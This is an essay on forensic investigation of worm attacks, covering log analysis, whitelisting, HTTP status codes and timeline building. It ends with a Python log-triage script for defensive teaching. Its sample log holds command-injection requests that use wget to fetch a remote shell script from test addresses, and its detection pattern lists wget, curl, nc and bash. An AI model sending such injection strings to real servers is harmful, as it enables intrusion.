Worms are self-replicating malware that propagate across a computer network. Once a worm is inside a network it exploits vulnerabilities and configuration flaws on reachable hosts to copy itself to them, and the damage can be severe: infected hosts can be enrolled in botnets, used to launch DDoS attacks, mined for classified or sensitive information, or have files deleted and vital system files corrupted. Unlike viruses and Trojan horses, worms do not depend on human action to spread; they replicate on their own by attacking and compromising one system after another. Worms have a history of disabling large numbers of computers. In 1988 the Morris worm infected over 5,000 systems, roughly 10% of all computers then connected to the Internet (Davidoff & Ham, 2012). Keeping system security controls current and enforcing data security policies are essential if an organization wants to mitigate worm attacks and avoid the costs that come with them.
The first step in a forensic investigation of a suspected worm attack on a network port or an email server is identification: the investigator uses a network forensic analysis tool (NFAT) to establish the form and nature of the attack. Worms have many ways of penetrating a system (Davidoff & Ham, 2012), among them email and unvetted downloads. Identification gathers events, analyzes them, and determines whether an incident has in fact occurred; it is the act of establishing that an incident took place, and it gives incident handlers the information they need to determine when the worm reached the network. Incidents normally come to light through user complaints, network intrusion detection system (N-IDS) alerts, or manual review of web and email logs (Davidoff & Ham, 2012). Knowing whether the attack was automated (worm-driven) or human-driven is crucial when preparing to respond. A worm probes for vulnerable points on the network and enters through the first one it finds, so its log footprint is mechanical and repetitive; a human attacker typically performs reconnaissance before entering the system, and leaves log records that look different from those of a worm.
Beyond the NFAT itself, several other methods help identify an incident involving a worm. The first is keeping current on how worms are evolving: security communities publish periodic updates on new worms and changes in their behaviour, which helps the organization understand the latest threats (Joshi & Pilli, 2016). Subscribing to operating-system vendors' security notifications, the SANS Internet Storm Center, and the Bugtraq security mailing list helps in understanding an attack as it unfolds (Conti, 2007). Second, the organization needs to understand its own applications and the nature of the data they log. As noted above, a human-assisted attack leaves log records that look different from those of a self-propagating worm, so examining the logged data with the NFAT is an important step in determining the type and nature of the attack. Log examination also reveals what typical visitor behaviour looks like as opposed to malicious behaviour, and exposes the details behind any spike in activity (Joshi & Pilli, 2016).
To separate malicious from legitimate activity on the network, use web analytics tools and ad hoc queries against the logs. The investigators and the security function in charge of the investigation should understand HTTP status codes (200, the 300-series redirects, 500 and so on), because the distribution of codes can reveal important details about the attack at hand (Conti, 2007). When the investigator has trouble telling benign log entries apart from unknown or known threats, whitelisting with custom search strings in the NFAT is tremendously useful. To build a useful whitelist, remove requests for static HTML pages, cascading style sheets, .gif images and similar "noise" files. This cuts the search down to a volume the investigative team can work through in reasonable time and lets them understand the nature and impact of the attack.
Timestamps are the primary means of backtracking an incident in an investigation of the kind described here. In this case the organization and the investigators use the NFAT to acquire an image of the evidence (system logs and captured traffic) related to the attack, which gives them room to examine and analyze it (Conti, 2007). The team focuses on web and email history logs to pin down when the worm entered. They examine the logs and then write a report explaining what they judged to be malicious and when it first appeared on the network. That report matters for several reasons (Conti, 2007). First, it records the time at which the worm gained entry into the system. Second, it lists the resources that were affected. Last, it documents the state of the network after the attack. All of this information is critical: it lets the organization pursue remedies for the damage the attack caused.
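As an added worked example (not code from any of the cited texts), the following Python script applies the whitelist-and-status-code triage from the previous paragraph and the timestamp-based backtracking described above to a web-server access log. The log lines are constructed in Apache combined format using RFC 5737 test addresses; the list of "noise" extensions and the command-injection indicator are assumptions chosen for illustration and would be tuned to the real application. The point it shows beyond the prose is the log footprint of automated propagation: the same malformed request arriving from several different hosts, whose earliest timestamp is the best log-based estimate of when the worm reached the server.

```python
"""Triage of a web-server access log for worm-style activity.

Added example; not code from Conti, Davidoff & Ham or Joshi & Pilli.
The log lines are constructed (Apache combined format, RFC 5737 test
addresses); the noise whitelist and the injection indicator are
assumptions chosen for illustration.
"""
import re
from collections import Counter
from datetime import datetime
from urllib.parse import unquote

# Constructed sample log, not captured traffic.  Four lines are ordinary
# browsing; four are the same command-injection probe arriving from three
# different hosts, which is what automated propagation looks like in a log.
SAMPLE_LOG = """\
203.0.113.10 - - [10/Mar/2023:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2023:09:14:03 +0000] "GET /css/site.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.10 - - [10/Mar/2023:09:14:03 +0000] "GET /img/logo.gif HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2023:09:20:45 +0000] "GET /cgi-bin/status.cgi?cmd=;wget%20http://198.51.100.7/w.sh HTTP/1.0" 500 0 "-" "-"
198.51.100.7 - - [10/Mar/2023:09:20:46 +0000] "GET /cgi-bin/status.cgi?cmd=;wget%20http://198.51.100.7/w.sh HTTP/1.0" 500 0 "-" "-"
192.0.2.33 - - [10/Mar/2023:09:31:10 +0000] "GET /cgi-bin/status.cgi?cmd=;wget%20http://192.0.2.33/w.sh HTTP/1.0" 500 0 "-" "-"
192.0.2.34 - - [10/Mar/2023:09:31:11 +0000] "GET /cgi-bin/status.cgi?cmd=;wget%20http://192.0.2.34/w.sh HTTP/1.0" 500 0 "-" "-"
203.0.113.10 - - [10/Mar/2023:09:40:00 +0000] "GET /about.html HTTP/1.1" 304 0 "-" "Mozilla/5.0"
"""

# Apache/NCSA combined format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed whitelist: static content that only adds volume to the search.
NOISE_EXT = {".html", ".htm", ".css", ".gif", ".png", ".jpg", ".js", ".ico"}

# Assumed indicator: a shell separator followed by a download/exec command
# inside the request, checked after percent-decoding.
INJECT_RE = re.compile(r"[;|`]\s*(wget|curl|nc|sh|bash)\b", re.I)


def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are dropped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], TS_FMT)   # timezone-aware
        e["status"] = int(e["status"])
        e["decoded"] = unquote(e["path"])
        e["resource"] = e["decoded"].split("?", 1)[0]  # path without query
        entries.append(e)
    return entries


def status_class_counts(entries):
    """Tally responses by HTTP status class (2xx, 3xx, 4xx, 5xx)."""
    return Counter(f"{e['status'] // 100}xx" for e in entries)


def is_noise(entry):
    """True for static assets that belong on the whitelist."""
    res = entry["resource"]
    dot = res.rfind(".")
    return dot != -1 and res[dot:].lower() in NOISE_EXT


def filter_noise(entries):
    """Drop whitelisted noise so the remaining search is tractable."""
    return [e for e in entries if not is_noise(e)]


def flag_suspicious(entries):
    """Keep requests whose decoded request string carries the indicator."""
    return [e for e in entries if INJECT_RE.search(e["decoded"])]


def build_timeline(suspicious):
    """Summarise flagged events: entry time, spread of sources, resources hit."""
    if not suspicious:
        return None
    ordered = sorted(suspicious, key=lambda e: e["ts"])
    return {
        "first_seen": ordered[0]["ts"],            # estimated time of entry
        "last_seen": ordered[-1]["ts"],
        "sources": sorted({e["ip"] for e in suspicious}),
        "resources": sorted({e["resource"] for e in suspicious}),
        "statuses": dict(status_class_counts(suspicious)),
    }


def triage(text):
    """Full pass: parse, drop whitelisted noise, flag, and build the timeline."""
    entries = parse_log(text)
    kept = filter_noise(entries)
    return {
        "parsed": len(entries),
        "after_whitelist": len(kept),
        "status_classes": dict(status_class_counts(entries)),
        "timeline": build_timeline(flag_suspicious(kept)),
    }


if __name__ == "__main__":
    from pprint import pprint
    pprint(triage(SAMPLE_LOG))
```

Running the script on the constructed log shows the whitelist halving the entries to be examined, the 5xx responses clustering on a single CGI resource, and three distinct source addresses issuing the identical request, with the first hit at 09:20:45 UTC; that timestamp, the affected resource and the list of sources are exactly the facts the investigative report described above needs to record.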
It is equally important that the organization prevent such incidents in the first place. Software must be kept up to date, because new worms are written continuously to get past existing security controls by exploiting unpatched vulnerabilities. The organization should also invest in its network security by staying current on cybersecurity developments through links with security agencies and communities; this gives it both the skills to deal with threats and knowledge of new developments in the field.
- Conti, G. (2007). Security data visualization: Graphical techniques for network analysis. San Francisco, CA: No Starch Press.
- Davidoff, S., & Ham, J. (2012). Network forensics: Tracking hackers through cyberspace. Upper Saddle River, NJ: Prentice Hall.
- Joshi, R. C., & Pilli, E. S. (2016). Fundamentals of network forensics: A research perspective. London: Springer.